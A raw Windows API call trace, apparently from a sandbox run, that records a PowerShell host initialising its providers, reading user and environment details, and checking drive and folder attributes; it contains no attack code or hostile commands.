	[0213.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.813] CoTaskMemAlloc (cb=0x804) returned 0x1b375ae0
	[0213.813] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b375ae0, nSize=0x1ad868 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x1ad868) returned 0x1
	[0213.813] CoTaskMemFree (pv=0x1b375ae0) 
	[0213.813] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0213.813] GetUserNameW (in: lpBuffer=0x256de0, pcbBuffer=0x1ad8a8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x1ad8a8) returned 1
	[0213.813] CoTaskMemFree (pv=0x256de0) 
	[0213.814] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d2b918*="Environment", lpRawData=0x2d2b6a8) returned 1
	[0213.826] CoTaskMemAlloc (cb=0x104) returned 0x204160
	[0213.826] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0213.826] CoTaskMemFree (pv=0x204160) 
	[0213.827] CoTaskMemAlloc (cb=0x104) returned 0x204160
	[0213.827] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x204160, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0213.827] CoTaskMemFree (pv=0x204160) 
	[0213.827] CoTaskMemAlloc (cb=0x104) returned 0x204160
	[0213.827] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x204160, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
	[0213.827] CoTaskMemFree (pv=0x204160) 
	[0213.828] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x1ad410, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0213.828] SetErrorMode (uMode=0x1) returned 0x1
	[0213.828] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x1ad620 | out: lpFileInformation=0x1ad620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0213.828] SetErrorMode (uMode=0x1) returned 0x1
	[0213.829] GetLogicalDrives () returned 0x4
	[0213.829] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ad180, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0213.831] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0213.831] SetErrorMode (uMode=0x1) returned 0x1
	[0213.831] CoTaskMemAlloc (cb=0x68) returned 0x1b368900
	[0213.831] CoTaskMemAlloc (cb=0x68) returned 0x1b368970
	[0213.831] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b368900, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x1ad5f0, lpMaximumComponentLength=0x1ad5ec, lpFileSystemFlags=0x1ad5e8, lpFileSystemNameBuffer=0x1b368970, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ad5f0*=0x705ba84c, lpMaximumComponentLength=0x1ad5ec*=0xff, lpFileSystemFlags=0x1ad5e8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0213.832] CoTaskMemFree (pv=0x1b368900) 
	[0213.832] CoTaskMemFree (pv=0x1b368970) 
	[0213.832] SetErrorMode (uMode=0x1) returned 0x1
	[0213.832] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0213.833] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ad330, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0213.833] SetErrorMode (uMode=0x1) returned 0x1
	[0213.833] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ad590 | out: lpFileInformation=0x1ad590*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0213.833] SetErrorMode (uMode=0x1) returned 0x1
	[0213.833] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ad330, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0213.833] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ad1e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0213.833] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0213.834] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ad110, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0213.834] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0213.834] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ad160, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0213.835] SetErrorMode (uMode=0x1) returned 0x1
	[0213.835] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ad3c0 | out: lpFileInformation=0x1ad3c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0213.835] SetErrorMode (uMode=0x1) returned 0x1
	[0213.835] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ad160, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0213.835] SetErrorMode (uMode=0x1) returned 0x1
	[0213.835] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ad3c0 | out: lpFileInformation=0x1ad3c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0213.835] SetErrorMode (uMode=0x1) returned 0x1
	[0213.835] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ad200, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0213.835] SetErrorMode (uMode=0x1) returned 0x1
	[0213.835] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ad460 | out: lpFileInformation=0x1ad460*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0213.835] SetErrorMode (uMode=0x1) returned 0x1
	[0213.836] CoTaskMemAlloc (cb=0x804) returned 0x1b375ae0
	[0213.836] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b375ae0, nSize=0x1ad868 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x1ad868) returned 0x1
	[0213.836] CoTaskMemFree (pv=0x1b375ae0) 
	[0213.836] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0213.836] GetUserNameW (in: lpBuffer=0x256de0, pcbBuffer=0x1ad8a8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x1ad8a8) returned 1
	[0213.836] CoTaskMemFree (pv=0x256de0) 
	[0213.836] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d32970*="FileSystem", lpRawData=0x2d32700) returned 1
	[0213.872] CoTaskMemAlloc (cb=0x104) returned 0x204160
	[0213.872] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0213.872] CoTaskMemFree (pv=0x204160) 
	[0213.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.874] CoTaskMemAlloc (cb=0x804) returned 0x1b375ae0
	[0213.874] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b375ae0, nSize=0x1ad868 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x1ad868) returned 0x1
	[0213.874] CoTaskMemFree (pv=0x1b375ae0) 
	[0213.874] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0213.874] GetUserNameW (in: lpBuffer=0x256de0, pcbBuffer=0x1ad8a8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x1ad8a8) returned 1
	[0213.874] CoTaskMemFree (pv=0x256de0) 
	[0213.876] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d38160*="Function", lpRawData=0x2d37ef0) returned 1
	[0213.889] CoTaskMemAlloc (cb=0x104) returned 0x204160
	[0213.889] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0213.889] CoTaskMemFree (pv=0x204160) 
	[0219.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.190] CoTaskMemAlloc (cb=0x804) returned 0x1b375ae0
	[0219.190] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b375ae0, nSize=0x1ad868 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x1ad868) returned 0x1
	[0219.757] CoTaskMemFree (pv=0x1b375ae0) 
	[0219.757] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0219.758] GetUserNameW (in: lpBuffer=0x256de0, pcbBuffer=0x1ad8a8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x1ad8a8) returned 1
	[0219.758] CoTaskMemFree (pv=0x256de0) 
	[0219.758] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d6a4e8*="Registry", lpRawData=0x2d6a278) returned 1
	[0220.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0220.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0220.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0220.167] CoTaskMemAlloc (cb=0x804) returned 0x1b375ae0
	[0220.168] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b375ae0, nSize=0x1ad868 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x1ad868) returned 0x1
	[0220.168] CoTaskMemFree (pv=0x1b375ae0) 
	[0220.168] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0220.168] GetUserNameW (in: lpBuffer=0x256de0, pcbBuffer=0x1ad8a8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x1ad8a8) returned 1
	[0220.168] CoTaskMemFree (pv=0x256de0) 
	[0220.169] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d6f8b0*="Variable", lpRawData=0x2d6f640) returned 1
	[0220.174] CoTaskMemAlloc (cb=0x104) returned 0x204160
	[0220.174] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0220.174] CoTaskMemFree (pv=0x204160) 
	[0220.176] CoTaskMemAlloc (cb=0x104) returned 0x204160
	[0220.176] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0220.177] CoTaskMemFree (pv=0x204160) 
	[0220.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ad110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0220.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ad060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0220.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ad060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0220.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ad060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0222.586] CoTaskMemAlloc (cb=0x804) returned 0x1b375ae0
	[0222.586] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b375ae0, nSize=0x1ad868 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x1ad868) returned 0x1
	[0222.586] CoTaskMemFree (pv=0x1b375ae0) 
	[0222.586] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0222.586] GetUserNameW (in: lpBuffer=0x256de0, pcbBuffer=0x1ad8a8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x1ad8a8) returned 1
	[0222.586] CoTaskMemFree (pv=0x256de0) 
	[0222.587] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d83478*="Certificate", lpRawData=0x2d83208) returned 1
	[0223.349] CoTaskMemAlloc (cb=0x104) returned 0x204160
	[0223.349] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0223.349] CoTaskMemFree (pv=0x204160) 
	[0223.352] GetLogicalDrives () returned 0x4
	[0223.352] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ad4f0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0223.352] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0223.353] CoTaskMemAlloc (cb=0x20e) returned 0x1b36af30
	[0223.353] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b36af30 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0223.353] CoTaskMemFree (pv=0x1b36af30) 
	[0223.354] CoTaskMemAlloc (cb=0x104) returned 0x204160
	[0223.355] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0223.355] CoTaskMemFree (pv=0x204160) 
	[0223.355] CoTaskMemAlloc (cb=0x104) returned 0x204160
	[0223.355] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0223.355] CoTaskMemFree (pv=0x204160) 
	[0223.372] CoTaskMemAlloc (cb=0x104) returned 0x204160
	[0223.372] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0223.372] CoTaskMemFree (pv=0x204160) 
	[0224.019] CoTaskMemAlloc (cb=0x104) returned 0x204160
	[0224.019] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0224.019] CoTaskMemFree (pv=0x204160) 
	[0224.020] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0224.020] SetErrorMode (uMode=0x1) returned 0x1
	[0224.020] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x1ad4b0 | out: lpFileInformation=0x1ad4b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0224.020] SetErrorMode (uMode=0x1) returned 0x1
	[0224.021] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0224.021] SetErrorMode (uMode=0x1) returned 0x1
	[0224.021] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x1ad4b0 | out: lpFileInformation=0x1ad4b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0224.021] SetErrorMode (uMode=0x1) returned 0x1
	[0224.022] CoTaskMemAlloc (cb=0x104) returned 0x204160
	[0224.022] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0224.022] CoTaskMemFree (pv=0x204160) 
	[0224.034] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x1ad3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0224.036] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ad260, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0224.036] SetErrorMode (uMode=0x1) returned 0x1
	[0224.036] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ad470 | out: lpFileInformation=0x1ad470*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0224.036] SetErrorMode (uMode=0x1) returned 0x1
	[0224.036] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ad260, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0224.036] SetErrorMode (uMode=0x1) returned 0x1
	[0224.036] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ad470 | out: lpFileInformation=0x1ad470*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0224.037] SetErrorMode (uMode=0x1) returned 0x1
	[0224.037] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ad270, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0224.037] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ad160, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0224.037] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1ad260, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0224.037] SetErrorMode (uMode=0x1) returned 0x1
	[0224.037] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x1ad470 | out: lpFileInformation=0x1ad470*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0224.037] SetErrorMode (uMode=0x1) returned 0x1
	[0224.037] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1ad260, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0224.037] SetErrorMode (uMode=0x1) returned 0x1
	[0224.037] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x1ad470 | out: lpFileInformation=0x1ad470*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0224.037] SetErrorMode (uMode=0x1) returned 0x1
	[0224.037] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1ad270, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0224.037] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x1ad160, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0224.038] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x1ad260, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0224.038] SetErrorMode (uMode=0x1) returned 0x1
